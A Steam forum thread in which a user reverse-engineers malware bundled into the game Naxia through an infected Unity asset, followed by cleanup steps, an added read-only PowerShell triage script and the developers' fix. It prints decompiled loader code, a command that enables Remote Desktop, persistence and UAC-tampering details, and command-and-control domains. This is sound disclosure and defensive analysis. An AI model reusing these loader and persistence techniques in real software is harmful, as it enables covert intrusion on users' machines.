Naxia
This topic has been locked
atom0s Aug 18, 2020 @ 11:32pm
Warning - This Game Is Infected With A Virus
Update 08/21/2020 - New Game Update Fixes This Issue

Please see my post here:
https://steamcommunity.com/app/1049220/discussions/0/2801756152800557606/#c2801756152810253090

The game is no longer infected. Leaving the rest of the info below for full disclosure though.




Warning - This Game Is Infected
While the developers are claiming otherwise in the recent topics, this game is infected with a virus. I would avoid this game at all costs currently until this is sorted!

What the game is doing:

Upon launch, the game will extract a DLL that it is manually loading from memory called 'version.dll'. This is a fake, renamed threading module which is extracted to:
C:\Users\<yourname>\AppData\Local\Temp\version.dll

This file is not just a standard Version information based library, it attempts to connect to the internet AND it restores the Remote Desktop Service permissions on your system to attempt to allow unwanted access to your system:

[code]
std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(&Dst, "cmd.exe /c \"sc config SessionEnv start= auto&sc start SessionEnv\"", 0x41ui64);
[/code]

SessionEnv is the Remote Desktop service on Windows. This attempts to restore its startup type and force-start it.

It then tries to install itself as a .NET Framework sub-module via the .NET registry under the name 'tlpless.dll'. It gets the install paths to your .NET Framework via these keys:
SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727

This DLL also takes ANY command line passed to it and starts it in a silent console window attempting to exploit administrative permissions on your system, if the argument /start is present:

[code]
std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(&lpCommandLine, "cmd.exe /c start /b ", 0x14ui64);
sub_180002990(&lpCommandLine, &Filename);
sub_180002990(&lpCommandLine, " /error");
v7 = (CHAR *)&lpCommandLine;
if ( v45 >= 0x10 )
    v7 = lpCommandLine;
CreateProcessA(0i64, v7, 0i64, 0i64, 0, 0, 0i64, 0i64, &StartupInfo, (LPPROCESS_INFORMATION)&StartupInfo.hStdOutput);
if ( v45 < 0x10 )
    goto LABEL_64;
v8 = lpCommandLine;
[/code]

When the tlpless.dll is loaded, it will attempt to check for a valid internet connection via connecting to microsoft.com and google.com. Afterward if valid, it will call a method inside of the tlpless.dll called 'Add':

[code]
signed __int64 __fastcall StartAddress(LPVOID lpThreadParameter)
{
    HANDLE v1; // rax
    HMODULE v2; // rax
    void (*v4)(void); // rax

    while ( !InternetCheckConnectionA("http://microsoft.com", 1u, 0) && !InternetCheckConnectionA("http://google.com", 1u, 0) )
        Sleep(0x7530u);
    Sleep(0x7D0u);
    v1 = OpenThread(0x1FFFFFu, 0, dwThreadId);
    SuspendThread(v1);
    v2 = LoadLibraryA("tlpless.dll");
    if ( !v2 )
        return 1i64;
    v4 = (void (*)(void))GetProcAddress(v2, "Add");
    if ( !v4 )
        return 1i64;
    v4();
    Sleep(0xD4A50FFF);
    Sleep(0xD4A50FFF);
    Sleep(0xD4A50FFF);
    return 0i64;
}
[/code]

This will also drop other fake files into your temp folder that mask themselves as .NET related error reporting tools. THESE ARE FAKE. These contain the infected DLLs in their resources.

https://i.imgur.com/AOQCprN.png
Scan: https://www.virustotal.com/gui/file/1b3f266aa8c67a00723f9cfbd10349b05a71525e1c0402454320dca01b472311/detection

https://i.imgur.com/YLcIk7B.png
Scan: https://www.virustotal.com/gui/file/63ec3ef6eb4e0270e3475b3d4d8c1421275b59f533afc5988b3c25fbd3e0e554/detection

https://i.imgur.com/0gRU1zG.png
Scan: https://www.virustotal.com/gui/file/1b3f266aa8c67a00723f9cfbd10349b05a71525e1c0402454320dca01b472311/detection

The embedded DLLs are C# loaders that are used to invoke/load other modules. This is half-packed/protected:
https://i.imgur.com/TFvEEMH.png

This method decrypts a hardcoded infected script to exploit the system further.


DO NOT BUY THIS GAME.
DO NOT TRUST THIS GAME.


It is absolutely infected. I am reporting this to Steam as well.
Last edited by atom0s; Aug 21, 2020 @ 3:06pm
atom0s Aug 18, 2020 @ 11:33pm 
Infected files created/dropped:
- C:/Windows/Microsoft.NET/Framework/ntsync.exe
- C:/Windows/Microsoft.NET/Framework/version.dll

Modules to look for on your system:
- libntsc*.dll
- GNU\scntlib*.dll

While running, this will attempt to kill any process with the following partial name matches:
- askmgr
- rocessha
- rocexp
- ystemexplore
- anvir

It will try to download data/info from:
- "<removed>/jipperskrippersservice.ru/other/new.html"
- "<removed>/margancherforfun.com/other/new.html"
- "<removed>/cellavillibycurtiz.ru/other/new.html"


It will look for the following information:
- MoreStarsMoreSpace
- MoreStarsMoreSpace!

Then attempt to split and decrypt more files to install on your system to continue infection.

These new files are loaded with a base assumed class via:

[code]
private static string EB(string[] ns, string code)
{
    CSharpCodeProvider csharpCodeProvider = new CSharpCodeProvider();
    CompilerParameters compilerParameters = new CompilerParameters
    {
        GenerateExecutable = false,
        GenerateInMemory = true
    };
    compilerParameters.ReferencedAssemblies.Add("System.dll");
    compilerParameters.ReferencedAssemblies.Add("mscorlib.dll");
    for (int i = 0; i < ns.Length; i++)
    {
        compilerParameters.ReferencedAssemblies.Add(ns[i]);
    }
    CompilerResults compilerResults = csharpCodeProvider.CompileAssemblyFromSource(compilerParameters, new string[]
    {
        code
    });
    if (compilerResults.Errors.Count == 0)
    {
        object obj = compilerResults.CompiledAssembly.CreateInstance("MyNewClass");
        if (obj != null)
        {
            return Convert.ToString(obj.GetType().GetMethod("MyMethod").Invoke(obj, null));
        }
    }
    return "dothis";
}
[/code]
atom0s Aug 18, 2020 @ 11:33pm 
If you ran this game, and are potentially infected, then do the following. (DO NOT RESTART YOUR PC BEFORE DOING THIS STUFF!)

1. Uninstall the game until this is dealt with; it is not safe to run.

2. Clear your temp folder entirely.

3. Delete the infected droppers:
- C:/Users/<yourname>/AppData/Local/Temp/version.dll
- C:/Windows/Microsoft.NET/Framework/ntsync.exe
- C:/Windows/Microsoft.NET/Framework/version.dll

4. Ensure Remote Desktop is disabled on your system:
- See here for more info: https://www.howto-connect.com/enable-disable-remote-desktop-configuration-service-windows-10/

5. Look for any additional instances of 'ntsync.exe' and 'version.dll' you are not familiar with or were created recently when you first/recently launched Naxia. Remove those as well. (Do so with caution, as version.dll can be a legit module for certain applications!)

6. Block all access to the following websites in your hosts file / firewalls:
- jipperskrippersservice [dot] ru
- margancherforfun [dot] com
- cellavillibycurtiz [dot] ru

Infinite8  [developer] Aug 18, 2020 @ 11:41pm 
thanks for your report. we are investigating this issue, we will update you about the result.
Scriptiee Aug 19, 2020 @ 9:06am 
How the ♥♥♥♥ do you ship a game with an issue like this? Who and what are you out sourcing? This is insane.
Cerberus814 Aug 19, 2020 @ 11:24am 
@infinite8 stop talking trash, you scripted that s hit on the game lol.
atom0s Aug 19, 2020 @ 12:05pm 
Another file found to clean/remove:
- C:\Windows\System32\msfte.dll

Kuro X Kage Aug 19, 2020 @ 12:23pm 
Thanks for the findings atom0s! Unbelievable, almost grabbed this on sale.
Infinite8  [developer] Aug 20, 2020 @ 6:59am 
Hi, it seems we fixed the issue.
Please update the game then tell us the result. thanks for your cooperation.
Scriptiee Aug 20, 2020 @ 8:40am 
That's not enough, what the ♥♥♥♥ was it and how did it get there in the first place? You should give people an explanation and not just "fixed it". How the ♥♥♥♥ did it get there? I recommend everyone reports this game to Steam as this is ♥♥♥♥♥♥♥♥.
Infinite8  [developer] Aug 20, 2020 @ 8:50am 
First of all, we did not know about this issue. As we told you, we wanted to make sure that we fixed it before any explanation, but as we searched we found it was something created by the image icon of the game (crystal). We did talk with more people this week and got data from them about the issue; we did a lot in a few days, at least 20 builds, to find out what happened. You can see this link: https://answers.unity.com/questions/475053/my-game-has-a-virus-need-fix.html. We removed the game icon from the player settings (unity3d) as they said in the link, then we tried a new build and it seems it's gone! We found that it can happen when you have an SVG image that was converted into a .png file; it can inject any code in the SVG that causes this kind of problem. We are still searching for this issue. Please wait; as we told you before, we will update you about the result.
Last edited by Infinite8; Aug 20, 2020 @ 9:08am
wsgroves Aug 20, 2020 @ 12:38pm 
Damn that sucks. I was finally going to grab it on sale but I will wait now...
atom0s Aug 20, 2020 @ 11:32pm 
It is not fixed, the game is still infected.
atom0s Aug 21, 2020 @ 1:05pm 
After some more digging, I've found what's infected. The game ships with an infected/fake 'ICSharpCode.NRefactory.dll' library. This is fakely renamed to 'ICSharpCode.NRefactory.dll' from 'Unity.DataContract.dll' and is infected somewhere in Naxia's build process.

This module contains the default expected data of Unity.DataContract, but also includes an obfuscated infected loader. At runtime, this loader will attempt to decrypt a self-contained resource like this:

[code]
static c0b89d1135135315cc38faf72ae5a2c5d()
{
    if (c0b89d1135135315cc38faf72ae5a2c5d.ca341f6485be0e85a69fd2b0a4b56cf39 == null)
    {
        string text = "VW5pdHkuRGF0YUNvbnRyYWN0JA==";
        byte[] array = Convert.FromBase64String(text);
        text = Encoding.UTF8.GetString(array, 0, array.Length);
        Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(text);
        c0b89d1135135315cc38faf72ae5a2c5d.ca341f6485be0e85a69fd2b0a4b56cf39 = c87b7b5b75d14c0091514b9fe24471068.c4d973e50c3a94392daad2fec4c8ff9d9(97L, manifestResourceStream);
    }
}

internal static byte[] ced05941962a456a433fd86bac2cf78c8(long c13f99b17b7c2ad3edf46d8907bafefa7, Stream cb7afa863bb27b078b94c77e6467b748b)
{
    Stream stream = cb7afa863bb27b078b94c77e6467b748b;
    MemoryStream memoryStream = null;
    for (int i = 1; i < 4; i++)
    {
        cb7afa863bb27b078b94c77e6467b748b.ReadByte();
    }
    ushort num = (ushort)cb7afa863bb27b078b94c77e6467b748b.ReadByte();
    num = ~num;
    if ((num & 2) != 0)
    {
        DESCryptoServiceProvider descryptoServiceProvider = new DESCryptoServiceProvider();
        byte[] array = new byte[8];
        cb7afa863bb27b078b94c77e6467b748b.Read(array, 0, 8);
        descryptoServiceProvider.IV = array;
        byte[] array2 = new byte[8];
        cb7afa863bb27b078b94c77e6467b748b.Read(array2, 0, 8);
        bool flag = true;
        foreach (byte b in array2)
        {
            if (b != 0)
            {
                flag = false;
                break;
            }
        }
        if (flag)
        {
            array2 = c87b7b5b75d14c0091514b9fe24471068.cedfb0601f0470197fc7d5d4935c025e4(Assembly.GetExecutingAssembly());
        }
        descryptoServiceProvider.Key = array2;
        if (c87b7b5b75d14c0091514b9fe24471068.c23f88059027c84c0b3da25dca4b08032 == null)
        {
            if (c87b7b5b75d14c0091514b9fe24471068.c3f6cf188507936a5ec71a9d6161bc01a == 2147483647)
            {
                c87b7b5b75d14c0091514b9fe24471068.c23f88059027c84c0b3da25dca4b08032.Capacity = (int)cb7afa863bb27b078b94c77e6467b748b.Length;
            }
            else
            {
                c87b7b5b75d14c0091514b9fe24471068.c23f88059027c84c0b3da25dca4b08032.Capacity = c87b7b5b75d14c0091514b9fe24471068.c3f6cf188507936a5ec71a9d6161bc01a;
            }
        }
        c87b7b5b75d14c0091514b9fe24471068.c23f88059027c84c0b3da25dca4b08032.Position = 0L;
        ICryptoTransform cryptoTransform = descryptoServiceProvider.CreateDecryptor();
        int inputBlockSize = cryptoTransform.InputBlockSize;
        int outputBlockSize = cryptoTransform.OutputBlockSize;
        byte[] array4 = new byte[cryptoTransform.OutputBlockSize];
        byte[] array5 = new byte[cryptoTransform.InputBlockSize];
        int num2 = (int)cb7afa863bb27b078b94c77e6467b748b.Position;
        while ((long)(num2 + inputBlockSize) < cb7afa863bb27b078b94c77e6467b748b.Length)
        {
            cb7afa863bb27b078b94c77e6467b748b.Read(array5, 0, inputBlockSize);
            int count = cryptoTransform.TransformBlock(array5, 0, inputBlockSize, array4, 0);
            c87b7b5b75d14c0091514b9fe24471068.c23f88059027c84c0b3da25dca4b08032.Write(array4, 0, count);
            num2 += inputBlockSize;
        }
        cb7afa863bb27b078b94c77e6467b748b.Read(array5, 0, (int)(cb7afa863bb27b078b94c77e6467b748b.Length - (long)num2));
        byte[] array6 = cryptoTransform.TransformFinalBlock(array5, 0, (int)(cb7afa863bb27b078b94c77e6467b748b.Length - (long)num2));
        c87b7b5b75d14c0091514b9fe24471068.c23f88059027c84c0b3da25dca4b08032.Write(array6, 0, array6.Length);
        stream = c87b7b5b75d14c0091514b9fe24471068.c23f88059027c84c0b3da25dca4b08032;
        stream.Position = 0L;
        memoryStream = c87b7b5b75d14c0091514b9fe24471068.c23f88059027c84c0b3da25dca4b08032;
    }
    if ((num & 8) != 0)
    {
        if (c87b7b5b75d14c0091514b9fe24471068.ced61c462fd232c61ae470fb53aef3810 == null)
        {
            if (c87b7b5b75d14c0091514b9fe24471068.c01621a652ae853c86a3f85e897bc33c1 == -2147483648)
            {
                c87b7b5b75d14c0091514b9fe24471068.ced61c462fd232c61ae470fb53aef3810.Capacity = (int)stream.Length * 2;
            }
            else
            {
                c87b7b5b75d14c0091514b9fe24471068.ced61c462fd232c61ae470fb53aef3810.Capacity = c87b7b5b75d14c0091514b9fe24471068.c01621a652ae853c86a3f85e897bc33c1;
            }
        }
        c87b7b5b75d14c0091514b9fe24471068.ced61c462fd232c61ae470fb53aef3810.Position = 0L;
        DeflateStream deflateStream = new DeflateStream(stream, CompressionMode.Decompress);
        int num3 = 1000;
        byte[] buffer = new byte[num3];
        int num4;
        do
        {
            num4 = deflateStream.Read(buffer, 0, num3);
            if (num4 > 0)
            {
                c87b7b5b75d14c0091514b9fe24471068.ced61c462fd232c61ae470fb53aef3810.Write(buffer, 0, num4);
            }
        }
        while (num4 >= num3);
        memoryStream = c87b7b5b75d14c0091514b9fe24471068.ced61c462fd232c61ae470fb53aef3810;
    }
    if (memoryStream != null)
    {
        return memoryStream.ToArray();
    }
    byte[] array7 = new byte[cb7afa863bb27b078b94c77e6467b748b.Length - cb7afa863bb27b078b94c77e6467b748b.Position];
    cb7afa863bb27b078b94c77e6467b748b.Read(array7, 0, array7.Length);
    return array7;
}
[/code]

The resource is an encrypted, embedded block of Unicode strings that holds all the infection-related data, see here:
https://i.imgur.com/LUPqDkJ.png

As we can see, the expected information I posted above before is all here, with some added info that does not appear to be used all the time.

Firstly, the registry keys that are used to tell the infection if the system is currently/already infected are:
HKEY_CURRENT_USER\SOFTWARE\GNU\fver
HKEY_CURRENT_USER\SOFTWARE\GNU\cver

The virus uses this to prevent itself from re-running all the time.

Next is the remote website it uses to ensure you have internet access to continue the infection while executing. It will ping that site to check for internet status.

Next are the various bits of data it uses to locate where to drop files and infect your system:
/Microsoft.NET/Framework/ntsync.exe
/Microsoft.NET/Framework/version.dll

It pulls that data from the registry to get the full path to your .NET install folders as I showed in my previous posts.

Next the other files it tries to drop are in the temp folder which are:
- TPGenLic.dll
- cmst.exe
- version.dll

It will also try to add a scheduled task on the system to continue to re-infect the system under a DiskCleanup fake name. If this is successful in adding itself, it's hidden within:
Microsoft > Windows > DiskCleanup

As a fake task there to execute cmst.exe whenever possible.

This will also try to disable UAC/remove the prompt to prevent itself from being caught running as admin or running an untrusted file via editing the following registry key:
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
- ConsentPromptBehaviorAdmin

Then the rest of what it does is what I posted above in my previous posts.
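The following is an added, read-only host triage script that checks for the indicators collected across the posts in this thread (dropped files, the HKCU\SOFTWARE\GNU markers, the SessionEnv start type, the DiskCleanup task, and the UAC prompt setting). It is not code from atom0s or from the game; it assumes the default paths named in the posts (the user's temp folder and %windir%\Microsoft.NET\Framework) and the ScheduledTasks PowerShell module, and it only reports, so the deletion steps still have to be done by hand as described above.

```powershell
# Read-only triage for the indicators described in this thread.
# Constructed for this write-up, not code from the thread or the game;
# reports only, changes nothing. Run in an elevated PowerShell.
$ErrorActionPreference = 'SilentlyContinue'
$findings = @()

# 1. Dropped files named in the posts (temp folder, .NET framework dir, System32)
$paths = @(
    (Join-Path $env:TEMP 'version.dll'),
    (Join-Path $env:TEMP 'TPGenLic.dll'),
    (Join-Path $env:TEMP 'cmst.exe'),
    (Join-Path $env:windir 'Microsoft.NET\Framework\ntsync.exe'),
    (Join-Path $env:windir 'Microsoft.NET\Framework\version.dll'),
    (Join-Path $env:windir 'System32\msfte.dll')
)
foreach ($p in $paths) {
    if (Test-Path -LiteralPath $p) {
        $item = Get-Item -LiteralPath $p
        $findings += "File present: $p (created $($item.CreationTime))"
    }
}

# 2. Running droppers (the thread says not to reboot before cleaning)
Get-Process -Name ntsync, cmst | ForEach-Object {
    $findings += "Process running: $($_.Name) PID $($_.Id) -> $($_.Path)"
}

# 3. Infection markers under HKCU\SOFTWARE\GNU (fver / cver, as key or value)
$gnu = 'HKCU:\SOFTWARE\GNU'
if (Test-Path $gnu) {
    $names = @(Get-ChildItem $gnu | ForEach-Object PSChildName) + @((Get-Item $gnu).GetValueNames())
    foreach ($n in ($names | Where-Object { $_ -in 'fver', 'cver' })) {
        $findings += "Registry marker: $gnu\$n"
    }
}

# 4. SessionEnv forced to automatic start ('sc config SessionEnv start= auto')
$svc = Get-CimInstance Win32_Service -Filter "Name='SessionEnv'"
if ($svc -and $svc.StartMode -eq 'Auto') {
    $findings += "SessionEnv start type is Auto, state $($svc.State)"
}
# 5. Persistence: a task under Microsoft\Windows\DiskCleanup that runs cmst.exe
#    (the legitimate SilentCleanup task also lives here, so match on the binary)
Get-ScheduledTask -TaskPath '\Microsoft\Windows\DiskCleanup\' | ForEach-Object {
    $exe = ($_.Actions | ForEach-Object Execute) -join ' '
    if ($exe -match 'cmst\.exe') { $findings += "Scheduled task '$($_.TaskName)' runs $exe" }
}

# 6. UAC prompt disabled for admins (ConsentPromptBehaviorAdmin = 0)
$pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
if ($pol.ConsentPromptBehaviorAdmin -eq 0) {
    $findings += 'UAC ConsentPromptBehaviorAdmin is 0 (elevate without prompting)'
}
if ($findings.Count -eq 0) { 'No indicators from this thread were found.' } else { $findings }
```

A clean result from this script does not prove the machine is clean; it only confirms that the specific artifacts named in the thread are absent.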
atom0s Aug 21, 2020 @ 2:55pm 
Originally posted by Yeldo:
Man you can clearly see these devs do not care about their game, they must be trying to source money a different way by ♥♥♥♥♥♥♥ ours PCS stay away

This is not the case, and was not directly the dev's fault. Unity has an asset store that allows anyone to upload and sell assets for games to share with other developers. Unity makes it very clear they are not responsible for damage and do not actively scan for infected assets. They operate on a trust/faith-based system and report-based investigations.

Naxia was using a package that is currently infected, the specific one being:
https://assetstore.unity.com/packages/vfx/particles/spells/mesh-effects-67803

This asset is where the infected file originated from and is bundled into the game when built against it.

Did Naxia developers intentionally infect their game? No.
Did Naxia developers handle this a little poorly? Yes. But the lead dev reached out to me directly and worked with me via Discord to get this resolved, so I will say that once they took it a bit more seriously and understood the issue, they did care and did work to get it fixed with me.

The developer just pushed a new update which fixes this issue and the game, currently, is no longer infected.

As with any game that has a marketplace/asset store (Unity, CryEngine, Unreal) there is always this kind of risk. Naxia is not unique in suffering this kind of infection/attack.
A developer of this app has indicated that this post answers the original topic.
Infinite8  [developer] Aug 21, 2020 @ 3:02pm 
With the help of this user "atom0s" we figured out what happened. We used a third-party package called mesh effect; you can find it in the Unity asset store at https://assetstore.unity.com/packages/vfx/particles/spells/mesh-effects-67803#content. It has a DLL file under demo resources called ICSharpcode.Nrefactory.dll that caused the problem. We removed it from the game, created a ticket for Unity about the issue and told them what is going on with the package. Sorry for the problem, but now it is fixed. Many thanks to atom0s for helping us figure it out. This topic will close next week. You can now update the game and enjoy it.